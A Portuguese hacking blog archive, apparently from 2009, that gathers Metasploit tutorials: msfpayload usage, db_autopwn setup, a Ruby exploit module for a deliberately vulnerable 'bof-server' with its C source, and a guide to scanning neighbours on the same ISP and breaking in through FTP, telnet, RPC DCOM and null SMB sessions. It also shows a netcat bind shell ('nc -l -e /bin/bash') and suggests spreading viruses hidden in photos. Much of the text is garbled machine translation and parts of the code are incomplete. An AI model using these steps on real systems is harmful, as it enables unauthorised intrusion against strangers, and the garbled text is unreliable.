Arquivo da categoria ‘metasploit’

Msfpayload

A utilidade do msfpayload permite o usuário modificar cargas úteis existentes dependendo dos parâmetros fornecidos na linha de comando, e obtem a saída em C, Perl, ou o exemplo de seguimento de Raw. ilustra o uso do msfpayload. O msfpayload –h exibe uma lista de comandos  e opções que podem ser usadas junto com todas as cargas úteis disponíveis, segundo as indicações de figura 1.25. Nós precisamos agora de selecionar uma carga útil. A opção de S mostra-nos a informação sobre uma carga útil específica, segundo as indicações da figura 1.26 mais a frente.

Figure 1.25 A utilidade do msfpayload

1

Figure 1.26 Informação sobre uma carga útil específica

2

Após ter selecionado uma carga útil particular para jogar, nós podemos então mandar o msfpayload modificar valores dentro da carga útil, e produzindo uma saída com a opção de C.

A opção de P é usada para Perl scripts. Poderia igualmente output com o formato cru, que permite que seja conduzida a um outro programa, tal como o msfencode, ou poderia ser reorientado a uma lima. Como pode ser visto da saída mostrada acima, nós precisamos de ajustar dentro o parâmetro de CMD ordem para que uma carga útil seja criada, que executasse esse comando particular em cima da exploração bem sucedida. Nós ajustamos a um comando muito direto do dir, e obtê-los-emos a saída para incluí-la em um certificado do Perl, como mostrado abaixo: janelas de ./msfpayload/exec CMD=dir P. A saída desta é mostrada em figura 1.27.

Figure 1.27 Obtendo informaçoes com o commando dir

3

Fonte: livro Metasploit Toolkit for Penetration Testing

Nesta seção nós discutiremos as ferramentas que você precisará de setup seu ambiente de Metasploit.

Wireshark

Wireshark (conhecido mais cedo como etéreo) é uma de ferramentas de análise sniffing mais popular e de tráfego da rede. Wireshark funciona em Windows assim como uma maioria das variações de UNIX que incluem o linux, solaris, FreeBSD, e assim por diante.

Os tarballs e os binários da fonte podem ser transferidos de http://www.wireshark.org.

IDA

O IDA é uma das ferramentas de eliminação de erros as mais populares para Windows.

Primeiramente, o IDA é um separador, que mostra o código do conjunto de um binário (uma biblioteca de ligação executável ou dinâmica [DLL]). Igualmente vem com características avançadas que tentam fazer compreendendo o código do conjunto tão fácil como possível. Em segundo, é igualmente um depurador de programas, que permite que o usuário pise através da lima binária para determinar as instruções reais que estão sendo executadas, e a seqüência em que a execução ocorre. O IDA é amplamente utilizado para a pesquisa da vulnerabilidade da análise e do software do malware, entre outras

finalidades. O IDA pro pode ser comprado em http://www.datarescue.com.

UltraEdit

UltraEdit e EditPlus são editores de texto poderosos e são projetados especialmente para o código da escrita. Suportam a sintaxe color-coded que destaca para uma variedade de línguas, incluindo o Perl e o rubi. UltraEdit pode ser comprado em http://www.ultraedit.com.

Nmap/Nessus

Nmap e Nessus são as ferramentas de facto para fazer a varredura de sua rede antes das façanhas de lançamento. Agora que Metasploit pode integrar saídas de Nessus e de Nmap em sua própria base de dados, e usa então aquele para configurar que explora para funcionar, você precisa definitivamente de assegurar-se de que você tenha as versões as mais atrasadas e grandes dos estes software instalado em seu sistema. Também, Metasploit pode lanç Nmap dentro do msfconsole

Fonte: livro metasploit tooking

Auto Exploração

Criei este post com bastante explicação para todos do meu blog. Esta é uma técnica avançada do metasploit, porem muito fácil de si fazer, Todos podem tentar que vão dar conta numa boa.

Esta explicação é para o linux, Entretanto para aqueles que usam windows… Podem ficar despreocupados, pois vou criar um tutorial de auto-exploraçao para windows.

Para quem não sabe o que é a auto exploração, vou explicar… Este é o método mais eficaz para quem quer testar sua rede ou seu próprio computador. A AUTO EXPLORAÇAO consiste em testar cada um dos exploits do seu metasploit no alvo definido pelo atacante.

Eu sei que todos já sabem o que é metasploit, por isso não vou precisar ficar dizendo toda vez que eu for criar um post sobre o metasploit, E para quem não sabe… Veja outros posts deste mesmo site.

Com Esta ferramenta avançada, “qualquer pessoa, pode testar sua própria rede, suas plataformas, sistemas operacionais e sistemas do seu computador.

O metasploit Pode ser baixado em diversos lugares, porem aconselho a baixarem do próprio site.http://metasploit.org

Vamos começar agora, já Instalando. Quem já tem instalado pode pular esta parte

Faça o download do Metasploit. Link direto ou instale do jeito que voce deseja:
http://metasploit.org/framework/downloa … 3.2.tar.gz

Agora vamos descompactar e utilizar. Entre no console, vá ao diretório que foi salvo o metasploit e faça:

$ tar -xzvf framework-3.2.tar.gz

Entre no diretório com o comando:

$ cd framework-3.1

E execute o programa, no caso o console. Com o comando:

$ ./msfconsole

Auto Exploração

A auto exploração do metasploit consiste em scans feitos na vitima e com base em portas abertas, seleciona os exploits e testa exploit por exploit. Sendo assim, depois de configurado o metasploit faria o papel de uma invasão com apenas uma linha de comando.

Vou lembrar vocês de uma coisa, VOU ensinar vocês a testarem suas rede e sistemas. NÃO USEM ESSA FERRAMENTA PARA O MAL!!!

VAMOS LÁ

Agora precisamos instalar o Postgres. De o comando:

# yum install postgres

Após a instalação do postgres é nescessario ruby. Instale o ruby e rubygems

# yum install ruby rubygems

vamos agora instalar Active Record e Postgresql.

# gem install activerecord

# gem install postgresql.

Precisamos criar agora, tabelas para serem usadas pela auto exploraçao.

As informações do servidor, portas abertas e exploits utilizados são armazenadas em um banco de dados do postgres. Certificando que o serviço Postgres esta rodando em seu sistema, vamos criar as tabelas:

# su – postgres

$ psql -d template1 -U postgres

Estamos dentro do console do postgres, aqui iremos criar nossas tabelas.

Welcome to psql 7.4.16, the PostgreSQL interactive terminal.

Type: \\copyright for distribution terms
\\h for help with SQL commands
\\? for help on internal slash commands
\\g or terminate with semicolon to execute query
\\q to quit

template1=#

template1=# CREATE USER root WITH PASSWORD ‘minha senha’;
template1=# CREATE DATABASE metasploit3;
template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 to root;
template1=# \q

Criada nossa tabela, está tudo pronto para iniciar nossa auto exploração. Inicie o metasploit.

# cd framework-3.2 //ou qual versão você estiver instalada

# ./msfconsole

Dentro do console Metasploit, digite os comandos:

. load db_postgres

. db_create (em casos de erros, ignore.)

. db_hosts

. db_nmap “ip da vitima”

Após o programa fazer o scan, O metasploit ira jogar o scaneamento para o banco de dados. AGORA VEM A MELHOR PARTE, Após o scan, execute o comando

db_autpwn -p -t –e

O Metasploit ira executar exploit por exploit.

Aqui vai alguns argumentos para o db_autopwn:

-h indica este texto de ajuda

-t Show all matching exploit modules
-x mostra todos os módulos de harmonização da façanha
-p módulos seletos baseados em portas abertos

-e Façanhas do lançamento de encontro a todos os alvos combinados
-s Obter somente um único escudo por o sistema de alvo (NON-FUNCTIONAL)
-r Use um reverso escudo para conectar
-b Use um escudo do ligamento em um porta aleatória
-I [escala] Somente anfitriões da façanha dentro desta escala
-X [escala] Exclua sempre anfitriões dentro desta escala

OBS: SI AO COMEÇAR INSTALAR O POSTGRE E DER ALGUM ERRO, PESQUISE NO GOOGLE, COMO INSTALAR POSTGRE,  DAI, SERÁ MAIS FACIL DE RESOLVER.

Fonte: Invasao

Estou escrevendo este post para explicar melhor, um tutorial em vídeo que eu vi no google.video.com, de um cara que criou um vídeo muito explicativo para o group.metasploit.com(grupo de estudos metasploit brasil).

Aconsselho aquém está iniciando os estudos do metasploit, que dê uma olhada no vídeo, no site www.metasploit-br.com.

Agora vamos para a parte explicativa e pratica.

Eu vou dar o mesmo exemplo do cara do vídeo, BOF_SERVER.

Vou dar uma introdução de um dos tipos de invasão com o metasploit, chamada: Buffer overflows é um ataque usado por muitos que consiste em lotar os buffers(memoria disponivel para aplicativos), de um servidor e incluir na sua lista de processos algum programa tal como um keylogger ou um trojan etc…

Todos os sistemas sao vulneraveis a buffer overflows e a soluçao é a mesma, procurar se já existem correçoes existentes. Novos erros desse tipo surgem todos os dias, até o XP tem alguns.

Um dos usos famosos de buffer overflow é o telnet reverso. Ele consiste em fazer a maquina alvo conectar-se a um servidor no computador do cracker, fornecendo-lhe um shell (prompt) de comando.

Estas vulnerabilidades si exploram mais constantemente em um programa chamado: Metasploit.

Para quem não conhece, Tem uma categoria no meu blog chamada metasploit e outra chamada exploits, veja os pots e aprenda mais sobre o metasploit.

————————-Vamos ao que interessa agora————————–à

Eu peguei um exploit já pronto e também peguei um programa feito e vulnerável a buffer overflow.

Essa façanha foi feita no metasploit 3.0.

Este programa foi feito com o intuito de ser explorado dutante este artigo.

Eu vou falar a mesma coisa que o Rafaello pelagalli.: Eu não sou perito em invasão muito menos em metasploit, só me esforço o Maximo possível para aprender o que eu posso, portanto qualquer critica construtiva eu aceito para corrigir-me.

COMEÇANDO:

O programa que será explorado ele tem duas funções, Version e quit.

Quando digitar version, aparecerá a versão do bof-server

Quando digitar quit, obviamente sairá do programa.

Quando você for executar o bof-server.exe, faça o seguinte:escreva o nome do <programa> <porta>, para conectar e listar tudo naquela porta.

  • bof-server.exe 4242

Quando você executar o programa por exemplo na porta padrão que é 4242, entre em outro computador da rede e conecte pelo protocolo telnet mesmo.

Exemplo:

> telnet localhost 4242

> version

bof-server v0.01

> quit

Disconnect

Este programa separa 512 para o buffer( char buffer[512]; )

Como nos vimos acima na explicaçao do ataquede buffer overflow, Ele consiste em lotar buffers mais do que o suportado. No nosso exemplo: O programa só suporta “char buffer[512];“ então si fizermos o teste de mandar por exemplo “buffer[1024];“ ele não irá suportar o tanto de buffer e vai dar um erro no programa(chamado buffer). Com o metasploit nós pegamos estes erros e transformamos em uma tentativa de conexão.

E para explorarmos esta falha precisamos criar uma façanha no próprio metasploit para que o alvo seja explorado remotamente. E para criarmos uma façanha no metasploit, eu vou dar uma introdução de como criar um exploit.

Crie no subdiretório do metasploit dos módulos/exploits/os/type um arquivo chamado primeiroexploit.rb. No nosso caso aqui, o exploit já está pronto por isso não vou ficar perdendo tempo programando todo um exploit.

Escreva no seu exploit:

require ‘msf/core’

module Msf

# class name should reflect directories

class Exploits::Windows::Dummy::BofServer < Msf::Exploit::Remote

include Exploit::Remote::Tcp

# exploit relative informations

def initialize(info = {})

super(update_info(info,

‘Name’ => ‘bof-server exploit’,

‘Description’ => ‘This is an exploit for bof-server v0.01’,

‘Author’ => ‘xipe’, # You 😉

‘Version’ => ‘1.0’,

‘Payload’ =>

{

‘Space’ => 1024, # Space that payload can use.

# We don’t know yet

‘BadChars’ => “\x00”, # Chars that payloads should not

# contains. We don’t know yet

},

‘Platform’ => ‘win’,

‘Targets’ =>

[

[ ‘Windows XP SP2 English’,

{

‘Platform’ =>’win’,

‘Ret’ => 0xaaaaaaaa # Return address. We don’t know yet

}

],

],

‘DefaultTarget’ => 0))

end

def check

# Here we should check if the target is vulnerable

# This function should not crash the target

end

def exploit

# Here we should exploit the target

end

end

end

/*Lembrando, é importante para aqueles que nunca criaram um exploit, ESCREVER ESTE EXPLOIT E NÃO COPIAR E COLAR.

Lembrando: todos as linhas que tem “#”, não fazem parte do codigo, só é comentários feitos que o metasploit aceita colocar.(sem problemas) não precisa excluir

OBS: aprenda algumas coisas que todos os programas que criam programas aceitam a fazer, exemplo: função: DO, WHILE, IF, END, FOR e ETC.

OBS1: não precisa de muita coisa para entender este exploit, tudo está bem obvio e o que tiver bem obvio eu não explico, pois da para entender, a não ser que você seja um piiiiiii. exemplo: palavras em inglês similares as do português. */

——————————————————————————-

Nossa execução remota do código das licenças do bof-server, devido a uma pilha baseou o excesso de buffer introduzido pela função do getl(int fd, char *s). Se você precisa mais informações a respeito dos excessos baseados a estouros na memória. Leia sobre Aleph1 que fala muito sobre isso, muito bom o livro!(nunca vi, mas pessoas recomendaram-me a postar ele aqui.

Mais voltando, nós podemos fazer nosso programa parar com:

> perl -e “print ‘A’x1024” | nc localhost 4242

> telnet localhost 4242

Connecting To localhost…Could not open connection to the host, on port 4242: Connect failed

———————————————————————————————

Agora é hora de começar dar as informações que faltam, nós já sabemos que quando emitimos 1024 bytes dos dados faz nosso usuário deixar de funcionar. Metasploit dá uma ferramenta muito fresca para explorar diversos tipos de ataques. Agora você já sabe quantos bytes precisam de ser emitidos para encher o amortecedor remoto e para deixar de funcionar o alvo. Esta ferramenta é composta de 2 certificados: pattern_create.rb e pattern_offset.rb. Nós não usaremos pattern_create.rb, mas a função do pattern_create () em seu certificado da façanha preferivelmente. Está aqui sua função nova da façanha de nosso certificado: façanha do def # aqui nós devemos explorar o alvo conecte buf = pattern_create (1024) sock.put (buf) sock.get disconexão de extremidade

Como você onde ver pattern_offest.rb retornou 520, assim que 520 bytes + 4 são necessários para fazer o alvo deixar de funcionar. Olhando a pilha nós devemos igualmente poder encontrar o endereço de começo do amortecedor transbordado (aqui eu começo 0×22fb65). Nós temos agora completamente todas as informações necessários para nossa façanha. Único permanecer das coisas é o BadChars. BadChars é os caráteres que não devem ser emitidos ao alvo, porque o alvo os modifica, nem se comportam diferentemente ao os encontrar. Além disso, em nosso depurador de programas, olhando o código do conjunto (em torno de 0×4146D) nós encontramos que o alvo está fazendo algo especial com os caráteres 0×0A, 0×0D e 0×20. Usando todas estas informações nós podemos agora coloca-los em nosso certificado da façanha. Nosso certificado da façanha. Olhe esta:

require ‘msf/core’

module Msf

# class name should reflect directories

class Exploits::Windows::Dummy::BofServer < Msf::Exploit::Remote

include Exploit::Remote::Tcp

# exploit relative informations

def initialize(info = {})

super(update_info(info,

‘Name’ => ‘bof-server exploit’,

‘Description’ => ‘This is an exploit for bof-server v0.01’,

‘Author’ => ‘xipe’, # You 😉

‘Version’ => ‘1.0’,

‘Payload’ =>

{

# We found that we needed 520 bytes to make the

# bof-server crash, but we will only use 500, as

# the end of this space can be modified by the target

‘StackAdjustment’ => -3500, # Modify stack pointer at shellcode start

# so it can use the stack without writing

‘BadChars’ => “\x00\x20\x0D\x0A”, # Chars that payloads should not

},

‘Platform’ => ‘win’,

‘Targets’ =>

[

[ ‘Windows XP SP2 English’,

{

‘Platform’ =>’win’,

}

],

],

‘DefaultTarget’ => 0))

end

def check

# Here we should check if the target is vulnerable

# This function should not crash the target

connect

buf = “version\n”

sock.put(buf)

res = sock.get

disconnect

if res =~ /bof-server v0.01/

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def exploit

# Here we should exploit the target

connect

buf << make_nops(20) # Some more bytes, as we defined the payload to be 500 bytes long

buf << [target.ret].pack(‘V’) # Return address
sock.put(buf) # send data

sock.get

handler # pass the connection to the payload handler

disconnect

end

end

end

Aqui só tem pots legais e intereçantes aqui no blog, não perca tempo deixe este site no seu favoritos, para você estar sempre atualizado em questão de segurança em rede.

AGORA EU LEMBREI, TENHO QUE COLOCAR O CODIGO DO PROGRAMA EM C E ensina-lo a compilar.

Aqui está o código do programa vulneravei a buffer overflow criado por um tal de Raffaello Pelagalli:

/*

** bof-server.c for bof-server

**

** Made by Raffaello Pelagalli

**

** Started on Mon Jan 21 14:13:07 2008 Raffaello Pelagalli

** Last update Wed Jan 23 00:08:18 2008 Raffaello Pelagalli

**

** This library is free software; you can redistribute it and/or

** modify it under the terms of the GNU Lesser General Public

** License as published by the Free Software Foundation; either

** version 2.1 of the License, or (at your option) any later version.

**

** This library is distributed in the hope that it will be useful,

** but WITHOUT ANY WARRANTY; without even the implied warranty of

** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU

** Lesser General Public License for more details.

**

** You should have received a copy of the GNU Lesser General Public

** License along with this library; if not, write to the Free Software

** Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA

** 02111-1307 USA

*/

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <winsock.h>

#define BACKLOG 5

#define VERSION_STR “bof-server v0.01”

void usage(char * name){

printf(“Escreva aaqui a porta a ser monitorada: %s <port>\n”, name);

exit (-1);

}

void bserv_error(char *s, int n, char *msg){

fprintf(stderr, “%s at line %i: %s, %s\n”, s, n, msg, strerror(errno));

exit(-1);

}

int getl(int fd, char *s){

int n;

int ret;

s[0] = 0;

for (n = 0; (ret = recv(fd, s + n, 1, 0)) == 1 &&

s[n] && s[n] != ‘\n’; n++)

;

if (ret == -1 || ret == 0)

return (-1);

while (n && (s[n] == ‘\n’ || s[n] == ‘\r’ || s[n] == ‘ ‘)) {

s[n] = 0;

n–;

}

return (n);

}

void manage_client(int s)

{

char buffer[512];

int cont = 1;

while (cont)

{

send(s, “\r\n> “, 4, 0);

if (getl(s, buffer) == -1)

return ;

if (!strcmp(buffer, “version”))

send(s, VERSION_STR, strlen(VERSION_STR), 0);

if (!strcmp(buffer, “quit”))

cont = 0;

}

}

int main(int ac, char **av){

int p;

int s;

int i;

int pid;

int cli_s;

struct sockaddr_in sin;

struct sockaddr_in cli_sin;

if (ac != 2 || atoi(av[1]) > 65555)

usage(av[0]);

p = atoi(av[1]);

WSADATA wsaData;

if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {

fprintf(stderr, “WSAStartup failed.\n”);

exit(1);

}

if ((s = socket(PF_INET, SOCK_STREAM, 0)) == -1)

bserv_error(__FILE__, __LINE__, “socket”);

sin.sin_family = AF_INET;

sin.sin_port = htons(p);

sin.sin_addr.s_addr = INADDR_ANY;

if (bind(s, (struct sockaddr*)&sin, sizeof(sin)) == -1)

bserv_error(__FILE__, __LINE__, “Can’t bind”);

if (listen(s, 42) == -1)

bserv_error(__FILE__, __LINE__, “Can’t listen”);

i = sizeof(cli_sin);

while ((cli_s = accept(s, (struct sockaddr*)&cli_sin, &i)) != -1)

{

printf(“[%i] %s connected\n”, cli_s, inet_ntoa(cli_sin.sin_addr));

manage_client(cli_s);

printf(“[%i] %s disconnected\n”, cli_s, inet_ntoa(cli_sin.sin_addr));

closesocket(cli_s);

}

perror(“accept”);

closesocket(s);

return (0);

}

Qualquer duvida post aqui no BLOG que eu irei fazer o possível para responder todas as perguntas.

Estou fazendo esse tutorial aqui, porque me pediram para postar aqui. Mais eu odeio esse tipo de ataque, pois esse tipo de ataque não satisfaz as nossas necessidades. UMA PERGUNTA: porque pessoas gostam de ficar invadindo computadores aleatoriamente sem saber donde é aquele computador, sem saber de nada?

Eu mesmo respondo. Essas pessoas que fazem isso são lammers que saem tentando invadir tudo quanter sistema para si gabar para seus amigos. AIAAIAIAI

Um conselho para todos vocês que sabem invadir ou estão aprendendo: VOCE NÃO PRECISA FALAR PARA NINGUEM QUE VOCE SABE INVADIR, POIS QUANDO SURGIR A NECESSIDADE, VOCE SURPREENDERÁ OUTRAS PESSOAS!

Um tutorial bem simples e obsoleto que é ainda muito usado nos dias de hoje (por lammers).

Invasão pelas portas:

21: FTP

23: TELNET

135: RPC

445: COMPARTILHAMENTO

Estes ataques precisam ter pessoas do mesmo provedor que você.

Vamos começar:

Pegue o seu ip externo(sugestão: www.meuip.com.br).

Baixe o nmap e instale no seu pc.

Vamos supor que o seu ip seja: 201.33.22.18.

Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.

Prosseguindo…

Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.

digite:

nmap -sV -T Insane -A -v  201.33.22.1-254 -p21,23,135,44

Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.

Código:

Discovered open port 21/tcp on 201.33.22.223
Discovered open port 23/tcp on 201.33.22.1
Discovered open port 23/tcp on 201.33.22.186
Discovered open port 445/tcp on 201.33.22.14
Discovered open port 445/tcp on 201.33.22.97
Discovered open port 445/tcp on 201.33.22.24
Discovered open port 445/tcp on 201.33.22.152
Discovered open port 445/tcp on 201.33.22.149
Discovered open port 445/tcp on 201.33.22.81
Discovered open port 445/tcp on 201.33.22.69
Discovered open port 445/tcp on 201.33.22.9
Discovered open port 445/tcp on 201.33.22.55
Discovered open port 445/tcp on 201.33.22.113
Discovered open port 445/tcp on 201.33.22.218
Discovered open port 445/tcp on 201.33.22.21
Discovered open port 445/tcp on 201.33.22.107
Discovered open port 445/tcp on 201.33.22.111
Discovered open port 445/tcp on 201.33.22.56
Discovered open port 445/tcp on 201.33.22.178
Discovered open port 445/tcp on 201.33.22.191
Discovered open port 445/tcp on 201.33.22.157
Discovered open port 445/tcp on 201.33.22.127
Discovered open port 445/tcp on 201.33.22.29
Discovered open port 445/tcp on 201.33.22.207
Discovered open port 135/tcp on 201.33.22.175
Discovered open port 135/tcp on 201.33.22.164

Invasao pela porta 21

vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.

Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a

Invasao pela porta 23

Iniciar>Executar>cmd>telnet>open>201.33.22  23

Invasao pela porta 135

CASO a porta 135 aberta, podemos usar o METASPLOIT

abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.

depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.

depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
Invasao pela porta 445

Esta porta é de compartilhamento.

Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:””

Comando concluído com êxito.
baixa o Dumpusers

ponha ele no C:\
abra o cmd digite;

dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
depois você vai no:

iniciar>executar>\\201.45.241.175\c$

Gente esse tipo de invasão é uma das mais ridículas. Aconcelho a nao fazerem isso.

Fonte: invasão.com.br

 

 

Como compilar exploits

Publicado: maio 12, 2009 em exploits, linux, metasploit
Tags:,

Como compilar exploits?

Primeiramente um exploit é um codigo construido em c, c++, vb, perl, etc… que toma vantagem sobre algum sistema.

Irei criar um pequeno tutorial de como compilar rapidamente.

_________________________________________

1º  –  voces terao que baixar o exploit a ser compilado, existem muitos sites que tem esses exploits, só que a maioria desses sites que fornecem exploits, fornecem na extençao .txt, por isso que si precisa de compilar um exploit.

exemplos de sites:

– Google.com

– Securiteam.com

– K-otik.com

– Astalavista.box.sk

– Coromputer.net

– Securityfocus.com

– MiLWorm.com

pegue qualquer exploit para fazer um teste.

Apos fazer isso, para quem nao tem linux instalado em casa, faça o seguinte baixe e instale o cygwin é um programa Windows que permite você a usar comandos linux dentro no Windows.

Depois de baixar instale-o

__________________________________________________

 

Depois de instalar é preciso compilar o exploit para ser usado corretamente sem erros.

CD c:\cygwin\bin

gcc exploit.c -o compilado.exe

__________________________________________________

 Quando voce terminar de finalizar a compilaçao do exploit poderemos usa-lo normalmente.

Exemplo:

linha de comando (Prompt), clicando em INICIAR –> EXECUTAR –> CMD

então escreva:

CD c:\cygwin\bin

compiledo.exe XXX.XXX.XXX.XXX -e

(XXX.XXX.XXX.XXX = IP da vàtima)

Pronto! Si o computador da vitima estiver vulnerável, conectará no computador da vitima normalmente.

Tecnicas de invasao e defesa

Existem muitas tecnicas de invasao e defesa, existem muitas que nao sao divulgadas na internet, pois são tão belas e adoraveis que pessoas que descobrem nao as divulgam publicamente. Exemplo: Muitos crackers nao divulgam suas tecnicas pois seriam ruim para eles, pois as falhas seriam corrigidas.
Vamos largar de conversa  e partir para a explicaçao.
Não falarei de todas as tecnicas, até porque eu nao sei de todas existentes. vou falar das mais utilizadas e precisas.
Tecnicas de Invasao
1º – tem que si definir o alvo
2º – Recolher informaçoes sobre o alvo
3º – Usar ferramentas para a invasao
4º – Phishing
5º – Esteganografia
<———Tecnicas invasao—————>
1 – definir um alvo
Para definir um alvo, voce pode usar o google, myspace, orkut, google groups.
Exemplo: google
* Voce pode fazer buscas especificas utilizando recursos avançados do google como as tags,Intitle, Inurl, Intext.
Esses recursos podem trazer belos resultados.

intranet2 – Engenharia social
engenharia social “é a arte de enganar”
Voce pode iludir uma pessoa a receber uma foto que teria um virus incluido na foto.
<———Ferramentas para intrusao—————>
Existem milhares de ferramentas para penetration(invasao), Porem vou mostrar aqui as melhores, “que eu acho”, (para a ferramenta ser boa, voce tem que gostar! e saber usar).
Google, Dig, Nmap, Nessus, Metasploit, Telnet, Sendip, John the ripper, Host, Hping3, Netcat.
=> Dig – Uma ferramenta quase igual ao nslookup, Porem mais flexivel, pode ser utilizada para fazer buscas como A, TXT, MX E NS.
dig +qr google.com any
;; ANSWER SECTION:
google.com. 10186 IN MX 10 smtp2.google.com.
google.com. 10186 IN MX 10 smtp3.google.com.
google.com. 10186 IN MX 10 smtp4.google.com.
google.com. 10186 IN MX 10 smtp1.google.com.
google.com. 318637 IN NS ns1.google.com.
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
;; AUTHORITY SECTION:
google.com. 318637 IN NS ns2.google.com.
google.com. 318637 IN NS ns3.google.com.
google.com. 318637 IN NS ns4.google.com.
google.com. 318637 IN NS ns1.google.com.
;; ADDITIONAL SECTION:
smtp1.google.com. 2986 IN A 72.14.203.25
smtp2.google.com. 2986 IN A 64.233.167.25
smtp3.google.com. 2986 IN A 64.233.183.25
smtp4.google.com. 2986 IN A 72.14.215.25
ns1.google.com. 345220 IN A 216.239.32.10
ns2.google.com. 345220 IN A 216.239.34.10
ns3.google.com. 345219 IN A 216.239.36.10
ns4.google.com. 345219 IN A 216.239.38.10

=>portScan –  PortScan é um scanneador de portas. o portscan ele sai batendo em cada uma das portas  e ve quais estao abertas. Um exemplo de portscan é o nmap. Nmap é um brilhante portScan existente no dia de hoje. É uma otima ferramenta, muito utilizada para invasao, para descobrir falhas nos sistemas e descobrir portas abertas desnecessariamente.

portscan=>Nessus –  o Nessus é uma ferramentas de autitoria muito usada para detectar e corrigir vulnerabilidades nos computadores da rede local. Nessus encontra bugs e mostra o link de sites para corrigir os BUGS.

=> Metasploit –  Essa é a melhor ferramenta que existe. É utilizado para escrever, testar e executar codigos de exploit. Foi desenvolvido para prover penetraçao em sistemas atraves de programas com bugs(erros).
Metasploit > console   e interface web.

metasploit

=> Telnet – Um protocolo para si conectar remotamente asistemas.
telnet http://www.alvo.com.br 80
Trying 200.189.171.181…
Connected to http://www.alvo.com.br.
Escape character is ‘^]’.
GET / HTTP/1.1
Host: http://www.alvo.com.br

=> John the ripper –    Um programa usado para descriptar senhas unix, dos, winNT?/win95 e tambem MD5,DES baseado na funcao CRYPT.

=> Hping3 –   Ferramenta capaz de enviar pacotes TCP, UDP E ICMP personalizados e receber respostas como consegue em icmp. com ele podemos fazer um ataque DoS.

=> Netcat –   Programa para consultoria de redes muito
conhecido, isso deve-se ao fato de ele ser um
programa muito versátil, podendo desde ser
um simples telnet, portscan até um sniffer.
TROJAN/nc
nc -l -e /bin/bash -p 1033
A porta 1033 será colocada em listenning, redirecionaremos a saida de dados para um shell (/bin/bash). Assim quando alguém se
conectar a essa porta terá domínio total sobre
o computador.
Sniffer/nc
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21
servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused
servidor9.molservidores.com [75.126.176.71] 110 (pop3) open
servidor9.molservidores.com [75.126.176.71] 25 (smtp) open
servidor9.molservidores.com [75.126.176.71] 21 (ftp) open

=> Phishing –  Phishing é um tipo de fraude projetada para
roubar sua identidade.Em um phishing scam,
uma pessoa mal-intencionada tenta obter
informações como números de cartões de
crédito, senhas, dados de contas ou outras
informações pessoais convencendo você a
fornecê-las sob pretextos enganosos.=> jp(hide an seek)   –   O jphide e o jpseek são programas utilizados
para esconder mensagens em arquivos JPEG.

<—————–Tecnicas CONTRA-INVASAO——————->
Firewall
(NHWK)IDS
HoneyPots
Antispam

=> Firewall –    Port Knock, uma solução leve e fácil de
configurar, permite que portas específicas só
sejam abertas no momento desejado atraves
de tentativas de conexão em portas
específicas.

=>(NHWK)IDS  –
NIDS – Network Intrusion Detection System
HIDS – Host-based Intrusion Detection System
WIDS – Wireless Intrusion Detection System
KIDS – Kernel Intrusion Detection System

=>  HoneyPots –  Útil para vigilância e alerta aos tipos de
ataques mais utilizados porem deve ser
utilizado com cuidado para que o invasor não
tenha acesso a rede real.

=> Antispam –   Indispensável para qualquer MX, útil para evitar
emails forjados e de domínios não confiaveis,
pode ser incrementado com opções de RBL e
CAPTCHA (“Completely Automated Public
Turing test to tell Computers and Humans
Apart”).